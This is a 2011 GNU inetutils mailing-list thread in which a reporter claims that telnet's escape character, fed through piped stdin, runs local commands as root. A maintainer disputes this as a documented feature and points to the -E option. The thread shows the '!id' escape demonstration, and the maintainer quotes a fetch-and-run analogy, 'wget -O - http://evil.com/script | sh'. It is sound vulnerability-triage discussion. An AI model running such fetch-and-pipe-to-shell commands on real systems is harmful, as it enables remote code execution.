bug-inetutils
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [bug-inetutils] telnet security advisory


From: Simon Josefsson
Subject: Re: [bug-inetutils] telnet security advisory
Date: Mon, 03 Oct 2011 20:11:52 +0200
User-agent: Gnus/5.110018 (No Gnus v0.18) Emacs/23.2 (gnu/linux)

sha0 <address@hidden> writes:

> Hi Simon,
>
> I know this is a "feature", but connecting the stdin of telnet with any kind
> of controllable input, will rely en command execution, is a danger default
> option.

I'm not sure I follow -- connecting the stdin of /bin/sh (as root) with
any kind of input controllable by an attacker is equally dangerous.
What difference do you see between that example and your problem?

Also, doesn't the -E parameter work?  It should disable the escape
sequence.

> I have also another vulnerability related with stdin parser,  is a SIGSEGV,
> i'm studying if I can control the movl to overwrite a memory function
> pointer in order to get execution,

Can you post a backtrace?  The telnet interactive prompt parser is most
likely just buggy.

/Simon

> But also the attack vector is stdin, then the attack vector is "rare"
>
>
> regards.
>
>
> 2011/10/3 Simon Josefsson <address@hidden>
>
>> sha0 <address@hidden> writes:
>>
>> > Hello,
>> >
>> > Is posible to inject a scape sequence via stdin to telnet, and arbitrary
>> > comands will be executed,
>>
>> Hi!  Thanks for studying InetUtils for security problems.  I'm not sure
>> I follow your "attack" though.
>>
>> > for example:
>> >
>> >
>> >  #  cat evil-file | telnet 127.0.0.1 80
>> > Trying 127.0.0.1...
>> > Connected to 127.0.0.1.
>> > Escape character is '^]'.
>> >
>> > telnet> !id
>> > uid=0(root) gid=0(root)
>> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1
>> > 0(wheel),19(log)
>> > Connection closed by foreign host.
>> >
>> >
>> > I think is very dangerous despite of few admins use telnet for moving
>> file
>> > like this
>>
>> Yes it is dangerous, so don't do that.  Use ftp to transfer files.
>>
>> > 3. DESCRIPTION
>> > -------------------------
>> > When telnet is used to transfer files to remote tcp port, a very
>> dangerous
>> > vulnerability is present, that lets a remote arbitrary code execution.
>>
>> The attack seems to be based on tricking the local root user into doing
>> something stupid.  This is similar to asking the local root user to do
>> 'wget -O - http://evil.com/script | sh'.  There is no security bug in
>> wget or sh just because that is possible.
>>
>> > 7. SOLUTION
>> > -------------------------
>> > The stdin parser must filter the 0x9d byte.
>>
>> The ^] escape sequence is a documented feature, so I don't think that is
>> a solution.
>>
>> You can use the command line parameter -E to inhibit the escape
>> character if you want.  Quoting 'telnet --help':
>>
>>  -E, --no-escape            use no escape character
>>
>> /Simon
>>



reply via email to

[Prev in Thread] Current Thread [Next in Thread]